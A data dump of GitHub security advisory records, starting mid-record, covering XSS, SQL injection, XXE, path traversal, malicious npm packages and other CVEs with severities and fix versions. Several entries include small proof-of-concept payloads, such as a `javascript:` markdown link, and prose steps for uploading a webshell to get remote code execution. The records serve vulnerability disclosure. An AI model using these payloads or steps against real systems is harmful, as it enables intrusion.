{'https://nvd.nist.gov/vuln/detail/CVE-2021-29521', 'https://github.com/tensorflow/tensorflow/commit/c57c0b9f3a4f8684f3489dd9a9ec627ad8b599f5', 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-hr84-fqvp-48mm', 'https://github.com/advisories/GHSA-hr84-fqvp-48mm'}
| null |
GHSA
|
GHSA-3qpg-33wr-533j
|
Improper Restriction of XML External Entity Reference in Magnolia CMS
|
An issue in the Export function of Magnolia v6.2.3 and below allows attackers to execute arbitrary code via a crafted XLF file.
|
{'CVE-2021-46365'}
|
2022-04-20T19:13:59Z
|
2022-02-12T00:00:37Z
|
HIGH
| 7.8
|
{'CWE-611'}
|
{'https://github.com/advisories/GHSA-3qpg-33wr-533j', 'https://docs.magnolia-cms.com/product-docs/6.2/Releases/Release-notes-for-Magnolia-CMS-6.2.4.html#_security_advisory', 'https://nvd.nist.gov/vuln/detail/CVE-2021-46365', 'https://github.com/DrunkenShells/Disclosures/tree/master/CVE-2021-46365-Unsafe%20XML%20Parsing-Magnolia%20CMS'}
| null |
GHSA
|
GHSA-w736-hf9p-qqh3
|
Key Caching behavior in the DynamoDB Encryption Client.
|
### Impact
This advisory concerns users of MostRecentProvider in the DynamoDB Encryption Client with a key provider like AWS Key Management Service that allows for permissions on keys to be modified.
When key usage permissions were changed at the key provider, time-based key reauthorization logic in MostRecentProvider did not reauthorize the use of the key. This created the potential for keys to be used in the DynamoDB Encryption Client after permissions to do so were revoked at the key provider.
### Patches
Fixed as of 1.15.0. We recommend users to modify their code and adopt `CachingMostRecentProvider`.
### Workarounds
Users who cannot upgrade to use the `CachingMostRecentProvider` can call `clear()` on the cache to manually flush all of its contents. Next use of the key will force a re-validation to occur with the key provider.
| null |
2021-02-08T17:43:36Z
|
2021-02-08T17:43:36Z
|
LOW
| 0
|
{'CWE-862'}
|
{'https://github.com/aws/aws-dynamodb-encryption-java/blob/master/CHANGELOG.md#1150----2021-02-04', 'https://github.com/advisories/GHSA-w736-hf9p-qqh3', 'https://github.com/aws/aws-dynamodb-encryption-java/commit/7de5f5a5929271ab25bce685089eb7ec564dac4b', 'https://github.com/aws/aws-dynamodb-encryption-java/security/advisories/GHSA-w736-hf9p-qqh3'}
| null |
GHSA
|
GHSA-c5xm-m64m-f2vq
|
Malicious Package in cxct
|
All versions of `cxct` contain malicious code. The package finds and exfiltrates cryptocurrency wallets.
## Recommendation
Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
| null |
2021-10-01T20:13:31Z
|
2020-09-04T15:23:47Z
|
CRITICAL
| 9.8
|
{'CWE-506'}
|
{'https://www.npmjs.com/advisories/1344', 'https://github.com/advisories/GHSA-c5xm-m64m-f2vq'}
| null |
GHSA
|
GHSA-wmwp-pggc-h4mj
|
Cross-site Scripting in Documize
|
domain/section/markdown/markdown.go in Documize before 3.5.1 mishandles untrusted Markdown content. This was addressed by adding the bluemonday HTML sanitizer to defend against XSS.
|
{'CVE-2019-19619'}
|
2021-05-18T15:30:30Z
|
2021-05-18T15:30:30Z
|
MODERATE
| 6.1
|
{'CWE-79'}
|
{'https://github.com/documize/community/releases/tag/v3.5.1', 'https://github.com/documize/community/compare/v3.5.0...v3.5.1', 'https://github.com/documize/community/commit/a4384210d4d0d6b18e6fdb7e155de96d4a1cf9f3', 'https://nvd.nist.gov/vuln/detail/CVE-2019-19619', 'https://github.com/advisories/GHSA-wmwp-pggc-h4mj'}
| null |
GHSA
|
GHSA-73hr-6785-f5p8
|
Malicious Package in donotinstallthis
|
The package `donotinstallthis` contained malicious code. The package contained a script that was run as part of the install script. The script contacted a remote service tracking how many installations were done. There is no further compromise.
## Recommendation
Remove the package from your environment.
| null |
2021-09-30T21:25:01Z
|
2020-09-02T21:24:55Z
|
CRITICAL
| 9.8
|
{'CWE-506'}
|
{'https://github.com/advisories/GHSA-73hr-6785-f5p8', 'https://www.npmjs.com/advisories/887'}
| null |
GHSA
|
GHSA-jmv4-73v2-pvgc
|
Cross-site Scripting in OpenNMS Horizon
|
In OpenNMS Horizon, versions opennms-1-0-stable through opennms-27.1.1; OpenNMS Meridian, versions meridian-foundation-2015.1.0-1 through meridian-foundation-2019.1.18-1; meridian-foundation-2020.1.0-1 through meridian-foundation-2020.1.6-1 are vulnerable to Stored Cross-Site Scripting since there is no validation on the input being sent to the `name` parameter in `noticeWizard` endpoint. Due to this flaw an authenticated attacker could inject arbitrary script and trick other admin users into downloading malicious files.
|
{'CVE-2021-25929'}
|
2021-05-28T22:27:12Z
|
2021-05-25T18:46:58Z
|
MODERATE
| 4.8
|
{'CWE-79'}
|
{'https://nvd.nist.gov/vuln/detail/CVE-2021-25929', 'https://github.com/OpenNMS/opennms/commit/66c1f626bf38a7d1a9530b4d68598269ee5245a2', 'https://github.com/advisories/GHSA-jmv4-73v2-pvgc', 'https://github.com/OpenNMS/opennms/commit/eb08b5ed4c5548f3e941a1f0d0363ae4439fa98c', 'https://www.whitesourcesoftware.com/vulnerability-database/CVE-2021-25929'}
| null |
GHSA
|
GHSA-ch3h-j2vf-95pv
|
XSS Vulnerability in Action View tag helpers
|
There is a possible XSS vulnerability in Action View tag helpers. Passing
untrusted input as hash keys can lead to a possible XSS vulnerability. This
vulnerability has been assigned the CVE identifier CVE-2022-27777.
Versions Affected: ALL
Not affected: NONE
Fixed Versions: 7.0.2.4, 6.1.5.1, 6.0.4.8, 5.2.7.1
## Impact
If untrusted data is passed as the hash key for tag attributes, there is a
possibility that the untrusted data may not be properly escaped which can
lead to an XSS vulnerability.
Impacted code will look something like this:
```
check_box_tag('thename', 'thevalue', false, aria: { malicious_input => 'thevalueofaria' })
```
Where the "malicious_input" variable contains untrusted data.
All users running an affected release should either upgrade or use one of the
workarounds immediately.
## Releases
The FIXED releases are available at the normal locations.
## Workarounds
Escape the untrusted data before using it as a key for tag helper methods.
|
{'CVE-2022-27777'}
|
2022-04-27T23:00:15Z
|
2022-04-27T22:32:49Z
|
HIGH
| 0
|
{'CWE-79'}
|
{'https://rubyonrails.org/2022/4/26/Rails-7-0-2-4-6-1-5-1-6-0-4-8-and-5-2-7-1-have-been-released', 'https://github.com/advisories/GHSA-ch3h-j2vf-95pv', 'https://nvd.nist.gov/vuln/detail/CVE-2022-27777', 'https://groups.google.com/g/ruby-security-ann/c/9wJPEDv-iRw', 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/actionview/CVE-2022-27777.yml', 'https://github.com/rails/rails/commit/649516ce0feb699ae06a8c5e81df75d460cc9a85'}
| null |
GHSA
|
GHSA-xqg8-cv3h-xppv
|
SQL Injection in sequelize
|
Versions 2.0.0-rc-7 and earlier of `sequelize` are affected by a SQL injection vulnerability when user input is passed into the order parameter.
## Proof of Concept
```javascript
Test.findAndCountAll({
where: { id :1 },
order : [['id', 'UNTRUSTED USER INPUT']]
})
```
## Recommendation
Update to version 2.0.0-rc8 or later
|
{'CVE-2015-1369'}
|
2021-09-22T15:12:12Z
|
2017-10-24T18:33:36Z
|
HIGH
| 0
|
{'CWE-89'}
|
{'https://github.com/sequelize/sequelize/issues/2906', 'http://www.openwall.com/lists/oss-security/2015/01/23/2', 'https://github.com/sequelize/sequelize/pull/2919', 'https://www.npmjs.com/advisories/33', 'https://nvd.nist.gov/vuln/detail/CVE-2015-1369', 'https://github.com/advisories/GHSA-xqg8-cv3h-xppv', 'https://nodesecurity.io/advisories/sequelize-sql-injection-order'}
| null |
GHSA
|
GHSA-f8x6-m9f5-ffp8
|
Unrestricted Upload of File with Dangerous Type in unisharp/laravel-filemanager
|
This affects the package unisharp/laravel-filemanager from 0.0.0. The upload() function does not sufficiently validate the file type when uploading. An attacker may be able to reproduce the following steps: - Install a package with a web Laravel application. - Navigate to the Upload window - Upload an image file, then capture the request - Edit the request contents with a malicious file (webshell) - Enter the path of file uploaded on URL - Remote Code Execution **Note: Prevention for bad extensions can be done by using a whitelist in the config file(lfm.php). Corresponding document can be found in the [here](https://unisharp.github.io/laravel-filemanager/configfolder-categories).
|
{'CVE-2021-23814'}
|
2022-01-06T21:08:34Z
|
2022-01-06T21:08:34Z
|
MODERATE
| 6.7
|
{'CWE-434'}
|
{'https://nvd.nist.gov/vuln/detail/CVE-2021-23814', 'https://github.com/advisories/GHSA-f8x6-m9f5-ffp8', 'https://github.com/UniSharp/laravel-filemanager/blob/master/src/Controllers/UploadController.php%23L26', 'https://snyk.io/vuln/SNYK-PHP-UNISHARPLARAVELFILEMANAGER-1567199'}
| null |
GHSA
|
GHSA-9j49-mfvp-vmhm
|
Code Injection in pac-resolver
|
This affects the package pac-resolver before 5.0.0. This can occur when used with untrusted input, due to unsafe PAC file handling. **NOTE:** The fix for this vulnerability is applied in the node-degenerator library, a dependency written by the same maintainer.
|
{'CVE-2021-23406'}
|
2021-09-02T17:10:06Z
|
2021-09-02T17:10:06Z
|
HIGH
| 8.1
|
{'CWE-94'}
|
{'https://snyk.io/vuln/SNYK-JS-PACRESOLVER-1564857', 'https://github.com/advisories/GHSA-9j49-mfvp-vmhm', 'https://github.com/TooTallNate/node-degenerator/commit/9d25bb67d957bc2e5425fea7bf7a58b3fc64ff9e', 'https://github.com/TooTallNate/node-pac-resolver/releases/tag/5.0.0', 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1568506', 'https://github.com/TooTallNate/node-degenerator/commit/ccc3445354135398b6eb1a04c7d27c13b833f2d5', 'https://nvd.nist.gov/vuln/detail/CVE-2021-23406'}
| null |
GHSA
|
GHSA-3fx4-7f69-5mmg
|
Integer Overflow in go-jose
|
go-jose before 1.0.5 suffers from a CBC-HMAC integer overflow on 32-bit architectures. An integer overflow could lead to authentication bypass for CBC-HMAC encrypted ciphertexts on 32-bit architectures.
|
{'CVE-2016-9123'}
|
2021-06-23T17:14:12Z
|
2021-06-23T17:14:12Z
|
HIGH
| 7.5
|
{'CWE-190'}
|
{'https://www.openwall.com/lists/oss-security/2016/11/03/1', 'https://github.com/square/go-jose/commit/789a4c4bd4c118f7564954f441b29c153ccd6a96', 'https://nvd.nist.gov/vuln/detail/CVE-2016-9123', 'https://hackerone.com/reports/165170', 'https://github.com/advisories/GHSA-3fx4-7f69-5mmg'}
| null |
GHSA
|
GHSA-qr4p-c9wr-phr6
|
Prototype pollution in set-in
|
Prototype pollution vulnerability in 'set-in' versions 1.0.0 through 2.0.0 allows attacker to cause a denial of service and may lead to remote code execution.
|
{'CVE-2020-28273'}
|
2021-03-19T21:01:46Z
|
2021-03-19T21:01:46Z
|
CRITICAL
| 9.8
|
{'CWE-1321'}
|
{'https://github.com/ahdinosaur/set-in/commit/e431effa00195a6f06b111e09733cd1445a91a88', 'https://nvd.nist.gov/vuln/detail/CVE-2020-28273', 'https://github.com/advisories/GHSA-qr4p-c9wr-phr6', 'https://www.whitesourcesoftware.com/vulnerability-database/CVE-2020-28273'}
| null |
GHSA
|
GHSA-fpwp-69xv-c67f
|
Moderate severity vulnerability that affects aiohttp-session
|
The pypi package aiohttp-session before 2.4.0 contained a Session Fixation vulnerability in load_session function for RedisStorage that can result in Session Hijacking. This attack appear to be exploitable via Any method that allows setting session cookies (?session=<>, or meta tags or script tags with Set-Cookie).
|
{'CVE-2018-1000519'}
|
2021-09-10T18:44:34Z
|
2018-09-13T15:46:40Z
|
MODERATE
| 6.5
|
{'CWE-384'}
|
{'https://github.com/aio-libs/aiohttp-session/issues/272', 'https://github.com/aio-libs/aiohttp-session/blob/master/aiohttp_session/redis_storage.py#L60', 'https://nvd.nist.gov/vuln/detail/CVE-2018-1000519', 'https://github.com/advisories/GHSA-fpwp-69xv-c67f'}
| null |
GHSA
|
GHSA-7mx5-x372-xh87
|
Incorrect Session Validation in Apache Airflow
|
Incorrect Session Validation in Apache Airflow Webserver versions prior to 1.10.14 with default config allows a malicious airflow user on site A where they log in normally, to access unauthorized Airflow Webserver on Site B through the session from Site A. This does not affect users who have changed the default value for `[webserver] secret_key` config.
|
{'CVE-2020-17526'}
|
2021-06-30T17:55:59Z
|
2021-04-20T16:40:27Z
|
HIGH
| 7.7
|
{'CWE-269'}
|
{'https://nvd.nist.gov/vuln/detail/CVE-2020-17526', 'http://www.openwall.com/lists/oss-security/2020/12/21/1', 'https://lists.apache.org/thread.html/rbeeb73a6c741f2f9200d83b9c2220610da314810c4e8c9cf881d47ef%40%3Cusers.airflow.apache.org%3E', 'https://github.com/advisories/GHSA-7mx5-x372-xh87', 'https://lists.apache.org/thread.html/r466759f377651f0a690475d5a52564d0e786e82c08d5a5730a4f8352@%3Cannounce.apache.org%3E'}
| null |
GHSA
|
GHSA-f9vc-q3hh-qhfv
|
Content Injection in remarkable
|
Versions 1.4.0 and earlier of `remarkable` are affected by a cross-site scripting vulnerability. This occurs because vulnerable versions of `remarkable` did not properly whitelist link protocols, and consequently allowed `javascript:` to be used.
### Proof of Concept
Markdown Source:
```
[link](<javascript:alert(1)>)
```
Rendered HTML:
```
<a href="javascript:alert(1)">link</a>
```
## Recommendation
Update to version 1.4.1 or later
|
{'CVE-2014-10065'}
|
2021-01-08T21:15:50Z
|
2020-08-31T22:56:00Z
|
HIGH
| 0
|
{'CWE-94'}
|
{'https://nvd.nist.gov/vuln/detail/CVE-2014-10065', 'https://github.com/advisories/GHSA-f9vc-q3hh-qhfv', 'https://github.com/jonschlinkert/remarkable/issues/97', 'https://nodesecurity.io/advisories/30', 'https://www.npmjs.com/advisories/30'}
| null |
GHSA
|
GHSA-997c-fj8j-rq5h
|
Arbitrary Code Execution
|
Docker 1.3.2 allows remote attackers to execute arbitrary code with root privileges via a crafted (1) image or (2) build in a Dockerfile in an LZMA (.xz) archive, related to the chroot for archive extraction.
|
{'CVE-2014-9357'}
|
2022-04-12T22:01:45Z
|
2022-02-15T01:57:18Z
|
HIGH
| 9.8
|
{'CWE-285'}
|
{'http://www.securityfocus.com/archive/1/534215/100/0/threaded', 'https://github.com/docker/docker/compare/aef842e7dfb534aba22c3c911de525ce9ac12b72...313a1b7620910e47d888f8b0a6a5eb06ad9c1ff2', 'https://groups.google.com/forum/#!msg/docker-user/nFAz-B-n4Bw/0wr3wvLsnUwJ', 'https://nvd.nist.gov/vuln/detail/CVE-2014-9357', 'https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9357', 'https://github.com/moby/moby/blob/master/CHANGELOG.md#133-2014-12-11', 'https://groups.google.com/forum/#%21msg/docker-user/nFAz-B-n4Bw/0wr3wvLsnUwJ', 'https://github.com/advisories/GHSA-997c-fj8j-rq5h'}
| null |
GHSA
|
GHSA-m6gx-rhvj-fh52
|
Denial of service in go-ethereum due to CVE-2020-28362
|
### Impact
Versions of Geth built with Go `<1.15.5` or `<1.14.12` are most likely affected by a critical DoS-related security vulnerability. The golang team has registered the underlying flaw as ‘CVE-2020-28362’.
We recommend all users to rebuild (ideally `v1.9.24`) with Go `1.15.5` or `1.14.12`, to avoid node crashes. Alternatively, if you are running binaries distributed via one of our official channels, we’re going to release `v1.9.24` ourselves built with Go `1.15.5`.
### Patches
This is not an issue in go-ethereum, rebuilding an older version with Go `1.15.5` or `1.14.12` will suffice to address the vulnerability.
### Workarounds
Rebuilding with Go `1.15.5` or `1.14.12` will suffice to address the vulnerability.
### References
- https://blog.ethereum.org/2020/11/12/geth_security_release/
- https://groups.google.com/g/golang-announce/c/NpBGTTmKzpM
### For more information
If you have any questions or comments about this advisory:
* Open an issue in [go-ethereum](https://github.com/ethereum/go-ethereum)
* Email us at [security@ethereum.org](mailto:security@ethereum.org)
| null |
2021-10-08T21:25:44Z
|
2021-06-29T21:13:54Z
|
CRITICAL
| 0
| null |
{'https://github.com/ethereum/go-ethereum/security/advisories/GHSA-m6gx-rhvj-fh52', 'https://github.com/advisories/GHSA-m6gx-rhvj-fh52'}
| null |
GHSA
|
GHSA-2grh-hm3w-w7hv
|
Race condition in tokio
|
An issue was discovered in the tokio crate before 1.8.1 for Rust. Upon a JoinHandle::abort, a Task may be dropped in the wrong thread.
|
{'CVE-2021-38191'}
|
2021-08-25T20:55:51Z
|
2021-08-25T20:55:51Z
|
MODERATE
| 5.9
|
{'CWE-362', 'CWE-366'}
|
{'https://rustsec.org/advisories/RUSTSEC-2021-0072.html', 'https://github.com/advisories/GHSA-2grh-hm3w-w7hv', 'https://nvd.nist.gov/vuln/detail/CVE-2021-38191', 'https://raw.githubusercontent.com/rustsec/advisory-db/main/crates/tokio/RUSTSEC-2021-0072.md', 'https://github.com/tokio-rs/tokio/issues/3929'}
| null |
GHSA
|
GHSA-gx2c-fvhc-ph4j
|
Path traversal in Hadoop
|
In Apache Hadoop, The unTar function uses unTarUsingJava function on Windows and the built-in tar utility on Unix and other OSes. As a result, a TAR entry may create a symlink under the expected extraction directory which points to an external directory. A subsequent TAR entry may extract an arbitrary file into the external directory using the symlink name. This however would be caught by the same targetDirPath check on Unix because of the getCanonicalPath call. However on Windows, getCanonicalPath doesn't resolve symbolic links, which bypasses the check. unpackEntries during TAR extraction follows symbolic links which allows writing outside expected base directory on Windows. This was addressed in Apache Hadoop 3.2.3
|
{'CVE-2022-26612'}
|
2022-04-19T15:09:07Z
|
2022-04-08T00:00:21Z
|
CRITICAL
| 9.8
|
{'CWE-22'}
|
{'https://lists.apache.org/thread/hslo7wzw2449gv1jyjk8g6ttd7935fyz', 'https://nvd.nist.gov/vuln/detail/CVE-2022-26612', 'https://github.com/advisories/GHSA-gx2c-fvhc-ph4j'}
| null |
GHSA
|
GHSA-q854-j362-cfq9
|
Cross-site Scripting in jsoneditor
|
Stored XSS was discovered in the tree mode of jsoneditor before 9.0.2 through injecting and executing JavaScript.
|
{'CVE-2020-23849'}
|
2021-10-12T16:22:30Z
|
2021-10-12T16:22:30Z
|
MODERATE
| 6.1
|
{'CWE-79'}
|
{'https://github.com/josdejong/jsoneditor/issues/1029', 'https://github.com/advisories/GHSA-q854-j362-cfq9', 'https://nvd.nist.gov/vuln/detail/CVE-2020-23849'}
| null |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.